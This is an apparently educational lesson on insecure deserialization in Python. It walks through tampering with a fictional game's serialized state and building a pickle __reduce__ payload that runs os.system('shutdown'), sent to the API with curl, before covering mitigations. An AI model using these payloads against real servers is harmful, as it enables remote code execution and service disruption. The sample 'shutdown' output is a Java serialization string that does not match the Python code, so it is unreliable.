
Insecure deserialization

Improper handling of serialized data containing user input

~20mins estimated


Insecure deserialization: the basics

What is insecure deserialization?

Serialization is a mechanism for transforming application data into a format suitable for transport or storage, typically a byte stream. Deserialization is the opposite process: converting a byte stream back into application data. Insecure deserialization is a vulnerability that occurs when attacker-controlled data is deserialized by the server. In the worst case, it can lead to remote code execution.

About this lesson

In this lesson, we will demonstrate an insecure deserialization attack by hacking the API of a video game company. Then, we will dive deeper into Python deserialization, explain how a crafted object can execute code when it is deserialized, and study vulnerable Python code. Finally, we will cover how to mitigate this vulnerability.

But first, let’s hack a video game!

FUN FACT

A game within a game

You discovered an arbitrary code execution bug in some software and are unsure what code to execute. We have some inspiration for you! Check out this article from a 2014 speedrunning event. The article describes how a group of clever speedrunners managed to reprogram one game into another game.

Discovering insecure deserialization vulnerabilities

Insecure deserialization in action

Hacking a web game

"Dungeons and Money" is here! Your long-time favorite game developer, GreedAndCo, has finally finished the multiplayer online game you have been waiting for since childhood. It’s 11:59pm, and you have been furiously restarting the game, hoping for the login screen to appear.

The clock strikes midnight. With excitement at its peak, you press the login button and finally start playing. But something is not right—even a level 1 rabbit is life-threatening. The game relies on microtransactions! You have to pay $10.99 for an epic sword if you want to kill rabbits. You can’t believe this—you’ve already paid big money for the game. Oh well, it’s time to put your hacker’s hat on and fix this injustice!

small-sword

Wow, this sword really is tiny. But I’m not paying to upgrade. Let’s take a look at the terminal below and see if we can make some modifications.

Understanding the API

You start by sniffing the network traffic the game sends from your machine while you play. A few minutes later, you notice that the game client does an HTTP POST to https://api.dungeonsandmoney.com/state/147983414 with the following payload:

{
"equipment":
"gASVgQAAAAAAAACMfXsibWV0YWRhdGEiOiB7InBhY2thZ2VfbmFtZSI6ICJjb20uZHVuZ2VvbnNhbmRtb25leS5zdGF0ZSIsICJjbGFzc19uYW1lIjogIkVxdWlwbWVudCJ9LCAiZmllbGRzIjogeyJpdGVtcyI6IFswLCAwLCAxLCAwLCAwXX19lC4=",
"location":
"gASVgQAAAAAAAACMfXsibWV0YWRhdGEiOiB7InBhY2thZ2VfbmFtZSI6ICJjb20uZHVuZ2VvbnNhbmRtb25leS5zdGF0ZSIsICJjbGFzc19uYW1lIjogIkVxdWlwbWVudCJ9LC",


}

Maybe these long strings are base64 encoded? Let’s take the equipment value and verify that! Run:

echo gASVgQAAAAAAAACMfXsibWV0YWRhdGEiOiB7InBhY2thZ2VfbmFtZSI6ICJjb20uZHVuZ2VvbnNhbmRtb25leS5zdGF0ZSIsICJjbGFzc19uYW1lIjogIkVxdWlwbWVudCJ9LCAiZmllbGRzIjogeyJpdGVtcyI6IFswLCAwLCAxLCAwLCAwXX19lC4= | base64 --decode > equip.pkl


Deserializing Python objects

The output might look complex, but it is just the base64-encoded representation of a serialized Python object. To understand its contents, we first decode the base64 string and then deserialize the result. The command above already handles the first step: it writes the decoded bytes to a file called equip.pkl.

Deserializing Python objects to a human-readable format

We will be deserializing objects into a human-readable format using the following script:
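The lesson's original script is not reproduced here, so the following is only a minimal sketch of what it might look like. Decoding the sample payload shows that the pickle wraps a JSON string, so the sketch unpickles first and then parses the JSON. The function name inspect_payload is hypothetical, and the base64 value is decoded in memory instead of being read from equip.pkl so that the snippet stands alone.

```python
import base64
import json
import pickle

# The "equipment" value captured from the POST request.
EQUIPMENT_B64 = "gASVgQAAAAAAAACMfXsibWV0YWRhdGEiOiB7InBhY2thZ2VfbmFtZSI6ICJjb20uZHVuZ2VvbnNhbmRtb25leS5zdGF0ZSIsICJjbGFzc19uYW1lIjogIkVxdWlwbWVudCJ9LCAiZmllbGRzIjogeyJpdGVtcyI6IFswLCAwLCAxLCAwLCAwXX19lC4="


def inspect_payload(b64_value: str) -> dict:
    """Decode, unpickle, and parse one captured payload (hypothetical helper)."""
    raw = base64.b64decode(b64_value)  # the same bytes that end up in equip.pkl
    inner = pickle.loads(raw)          # in this sample: a str containing JSON
    return json.loads(inner)


state = inspect_payload(EQUIPMENT_B64)
print(json.dumps(state, indent=2))
```

Note that pickle.loads() is itself the dangerous call this lesson is about. It is acceptable here only because we are inspecting data on our own machine; pickletools.dis() can show the contents of a pickle without executing anything.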


Changing the game state

Excellent! The serialized object represents the Equipment class. Upon closer inspection, you'll see it possesses an items field. The values of the items array are [0, 0, 1, 0, 0].

Your in-game character currently has only one item equipped: a level 1 sword, represented by the value 1 in the items array. What do you think will happen if we change that value to 20, so that the array becomes [0, 0, 20, 0, 0]? Our aim is to make the character stronger by raising the sword's level from 1 to 20.

The process has three steps:

  1. Modify the items array from [0, 0, 1, 0, 0] to [0, 0, 20, 0, 0] within the deserialized Python object.
  2. Serialize the modified Python object.
  3. Convert the serialized data to a base64 encoded string for transmission or storage.

We will serialize and base64 encode the Python object to prepare it for sending to the game API using the following script:
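As a rough sketch of the three steps (not the lesson's original script), the snippet below modifies the items array, re-serializes the object, and base64 encodes the result. The helper name upgrade_sword is hypothetical, and the sketch assumes the payload layout seen in the captured request: a pickled string that contains JSON.

```python
import base64
import json
import pickle

# The original "equipment" value captured from the POST request.
EQUIPMENT_B64 = "gASVgQAAAAAAAACMfXsibWV0YWRhdGEiOiB7InBhY2thZ2VfbmFtZSI6ICJjb20uZHVuZ2VvbnNhbmRtb25leS5zdGF0ZSIsICJjbGFzc19uYW1lIjogIkVxdWlwbWVudCJ9LCAiZmllbGRzIjogeyJpdGVtcyI6IFswLCAwLCAxLCAwLCAwXX19lC4="


def upgrade_sword(b64_value: str, new_level: int) -> str:
    """Return a new base64 payload with the sword slot set to new_level."""
    state = json.loads(pickle.loads(base64.b64decode(b64_value)))

    # Step 1: modify the items array (index 2 holds the sword in the sample).
    state["fields"]["items"][2] = new_level

    # Step 2: serialize the modified object the same way the client did.
    serialized = pickle.dumps(json.dumps(state), protocol=4)

    # Step 3: base64 encode the bytes for transmission.
    return base64.b64encode(serialized).decode("ascii")


new_payload = upgrade_sword(EQUIPMENT_B64, 20)
print(new_payload)
```

Pickle protocol 4 is pinned explicitly because the captured payload starts with the protocol 4 header, which keeps the output in the same format regardless of the Python version's default.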


After serializing and base64 encoding we get the following output:

gASVggAAAAAAAACMfnsibWV0YWRhdGEiOiB7InBhY2thZ2VfbmFtZSI6ICJjb20uZHVuZ2VvbnNhbmRtb25leS5zdGF0ZSIsICJjbGFzc19uYW1lIjogIkVxdWlwbWVudCJ9LCAiZmllbGRzIjogeyJpdGVtcyI6IFswLCAwLCAyMCwgMCwgMF19fZQu

Now we can attach this payload to the API POST request.

curl -H "Content-Type: application/json" -X POST -d '{ "equipment":"gASVggAAAAAAAACMfnsibWV0YWRhdGEiOiB7InBhY2thZ2VfbmFtZSI6ICJjb20uZHVuZ2VvbnNhbmRtb25leS5zdGF0ZSIsICJjbGFzc19uYW1lIjogIkVxdWlwbWVudCJ9LCAiZmllbGRzIjogeyJpdGVtcyI6IFswLCAwLCAyMCwgMCwgMF19fZQu" }' https://api.dungeonsandmoney.com/state/147983414

Remote code execution

You log into the game, and boom! Your level 1 sword just got upgraded to level 20. By manipulating serialized data, you managed to change the state of the game.

normal-sword

Now things are looking better! We can take on almost any enemy that comes our way. But can we take this one step further?

Observe the following code:
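The code itself is missing from this copy of the lesson. The sketch below is a reconstruction based on the names used in the explanation that follows (EvilClass, evil_instance, evil_payload); the harmless echo command is an assumption chosen so that the example is safe to run.

```python
import os
import pickle


class EvilClass:
    def __reduce__(self):
        # Tell pickle to "rebuild" this object by calling os.system(...)
        # instead of restoring any real state.
        return (os.system, ("echo pwned",))


evil_instance = EvilClass()

# Serializing only records the callable and its arguments.
evil_payload = pickle.dumps(evil_instance)

# Deserializing calls os.system("echo pwned"); the return value of
# pickle.loads() is whatever os.system returns (its exit status).
exit_status = pickle.loads(evil_payload)
```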

Explanation:

  1. EvilClass is defined with a special method __reduce__
  2. __reduce__ returns a tuple to run os.system with a specific command
  3. An instance of EvilClass is created as evil_instance
  4. evil_instance is serialized using pickle.dumps()
  5. Deserializing evil_payload using pickle.loads() executes the malicious command

You prepare the code below to generate a serialized, base64 encoded payload that will run the "shutdown" command when executed:
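The generator code is not included in this copy of the lesson, so here is a minimal sketch of how such a payload could be built with pickle. The class name ShutdownPayload and the helper build_payload are hypothetical. Building the payload does not run the command; only deserializing it would.

```python
import base64
import os
import pickle


class ShutdownPayload:  # hypothetical name
    def __reduce__(self):
        # On deserialization, pickle will call os.system("shutdown").
        return (os.system, ("shutdown",))


def build_payload() -> str:
    """Serialize the malicious object and base64 encode it (never loads it)."""
    serialized = pickle.dumps(ShutdownPayload(), protocol=4)
    return base64.b64encode(serialized).decode("ascii")


payload_b64 = build_payload()
print(payload_b64)
```

A protocol 4 pickle produced this way starts with gASV, like the equipment payloads earlier in the lesson. The sample value that follows begins with rO0AB, which is the prefix of a Java serialization stream, so expect the Python-generated string to look different from it.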

We should get: rO0ABXNyABFnYWRnZXQuRXZpbEdhZGdldJlTufMW09bEAgABTAAHY29tbWFuZHQAEkxqYXZhL2xhbmcvU3RyaW5nO3hwdAAIc2h1dGRvd24=

Now when we run the following, our game will change again:

curl -H "Content-Type: application/json" -X POST -d '{ "equipment": "rO0ABXNyABFnYWRnZXQuRXZpbEdhZGdldJlTufMW09bEAgABTAAHY29tbWFuZHQAEkxqYXZhL2xhbmcvU3RyaW5nO3hwdAAIc2h1dGRvd24=" }' https://api.dungeonsandmoney.com/state/147983414

Boom! Your game client crashes, and a gigantic red “Server is down” alert pops up on your screen. The shutdown command must have worked! But how?

ridiculously-large-sword

Insecure deserialization under the hood

State manipulation: a false sense of security

In the previous section, we saw how insecure deserialization can lead to state manipulation and remote code execution. State manipulation can happen whether or not serialization is used. However, because serialized payloads look more “obscure”, developers tend to assume that serialization somehow protects them against this kind of attack.

It does not. Whether a payload is a seemingly cryptic base64-encoded string or a straightforward JSON object, if a malicious actor can influence its contents, the integrity of the application is at risk. Rather than relying on obscurity, validate and sanitize any data, serialized or not, that comes from an untrusted source. If the client can unexpectedly manipulate server-side state, that is a clear sign that the API needs a more secure design.

Remote code execution

In the worst case, deserialization vulnerabilities can lead to remote code execution. Let’s look at the EvilClass class we used in the previous exercise.

Explanation

The __reduce__ method defines custom behavior for pickling: it tells pickle how to reconstruct the object. It returns a tuple whose first item is a callable (in this case, os.system) and whose second item is a tuple of arguments for that callable.

When a pickled instance of EvilClass is deserialized with pickle.loads(), pickle calls that callable with the specified arguments, which executes the malicious command.
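To see this mechanism without triggering it, the standard library's pickletools module can parse a pickle stream without executing it. The sketch below lists the opcodes of a payload built the same way as in the exercise; the echo command is a harmless stand-in, and nothing is ever loaded.

```python
import os
import pickle
import pickletools


class EvilClass:
    def __reduce__(self):
        return (os.system, ("echo pwned",))


payload = pickle.dumps(EvilClass(), protocol=4)

# genops() walks the stream and yields (opcode, argument, position)
# tuples; it only parses the bytes and never calls anything.
opcode_names = [opcode.name for opcode, arg, pos in pickletools.genops(payload)]
print(opcode_names)
```

In the listing, STACK_GLOBAL is the instruction that looks up the callable by module and name, and REDUCE is the instruction that calls it with the argument tuple. This is why simply loading the bytes is enough to run the command: the call is part of the pickle's own instruction stream.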

Other serialization frameworks

Pickle

As already discussed, Python's built-in pickle module is well-known for its insecure deserialization vulnerabilities. It allows serialization and deserialization of arbitrary Python objects, leading to the potential for arbitrary code execution if a malicious payload is processed.

PyYAML

The PyYAML library is used to parse YAML documents into Python objects. In older versions of the library, the yaml.load() method was vulnerable to arbitrary code execution through crafted YAML payloads. Using the yaml.safe_load() method instead is recommended as it limits deserialization to basic Python objects.

JSON Libraries

JSON libraries in Python are generally safe from deserialization attacks because JSON does not support complex types and functions. Instead, it deals with simple data structures. However, always validate the structure of the incoming data to prevent potential issues related to unexpected data types or structures.
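As an illustration of validating structure, here is a minimal sketch for the game's equipment data, assuming it were sent as plain JSON. The function name parse_equipment, the five-slot layout, and the level cap are assumptions made for the example and are not taken from the game's real API.

```python
import json

EXPECTED_SLOTS = 5   # assumption: the items array always has five slots
MAX_ITEM_LEVEL = 20  # hypothetical upper bound on an item level


def parse_equipment(body: str) -> list:
    """Parse a JSON body and return the items list, or raise ValueError."""
    data = json.loads(body)  # json.JSONDecodeError is a subclass of ValueError
    if not isinstance(data, dict):
        raise ValueError("payload must be a JSON object")

    items = data.get("items")
    if not isinstance(items, list) or len(items) != EXPECTED_SLOTS:
        raise ValueError("items must be a list with exactly five entries")

    for level in items:
        # bool is a subclass of int in Python, so reject it explicitly.
        if isinstance(level, bool) or not isinstance(level, int):
            raise ValueError("item levels must be integers")
        if not 0 <= level <= MAX_ITEM_LEVEL:
            raise ValueError("item level out of range")

    return items
```

Structural validation like this rejects malformed input, but it does not decide whether a player is entitled to a given item level. That check still has to be made against state the server controls.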


Insecure deserialization mitigation

Don't deserialize untrusted data

The golden rule for avoiding insecure deserialization issues is to never deserialize data that originates from an untrusted source, such as user input.
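When serialized data has to make a round trip through the client, one commonly suggested safeguard (the Python pickle documentation mentions it) is to sign the data with an HMAC and verify the signature before deserializing. This is a technique added here for illustration and is not part of the original lesson. The following is a minimal sketch; SECRET_KEY and the helper names are hypothetical, and a real key would come from secure configuration, not from source code.

```python
import hashlib
import hmac
import pickle

SECRET_KEY = b"server-side-secret"  # hypothetical; never hard-code a real key
TAG_LENGTH = hashlib.sha256().digest_size  # 32 bytes for SHA-256


def sign(data: bytes) -> bytes:
    """Prefix the serialized bytes with an HMAC-SHA256 tag."""
    tag = hmac.new(SECRET_KEY, data, hashlib.sha256).digest()
    return tag + data


def verify_and_load(blob: bytes):
    """Deserialize only if the tag proves the server produced the bytes."""
    tag, data = blob[:TAG_LENGTH], blob[TAG_LENGTH:]
    expected = hmac.new(SECRET_KEY, data, hashlib.sha256).digest()
    # compare_digest avoids leaking information through timing differences.
    if not hmac.compare_digest(tag, expected):
        raise ValueError("signature mismatch: refusing to deserialize")
    return pickle.loads(data)
```

The signature check runs before pickle.loads(), so a payload modified by the client is rejected without ever being deserialized. This only helps while the key stays secret, and it does not make pickle safe for data that other parties produce.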

Opt for simpler data structures

Deserializing complex data structures from untrusted sources is inherently unsafe, as it can result in arbitrary code execution. Whenever possible, opt for simpler serialization formats such as JSON, which does not support deserializing into arbitrary objects with complex types and functions.

Use safer function alternatives

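In older versions of PyYAML, calling yaml.load() without an explicit Loader could construct arbitrary Python objects, which poses a security risk. (Since PyYAML 6.0, yaml.load() requires a Loader argument.) In contrast, yaml.safe_load() only constructs simple Python data structures such as lists and dictionaries.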

Quiz

Test your knowledge!


When using PyYAML library, which method should you use to limit deserialization?


Congratulations

Woohoo! You've learned what the risks of insecure deserialization are and how to mitigate them. Make sure to check out our lessons on other common vulnerabilities.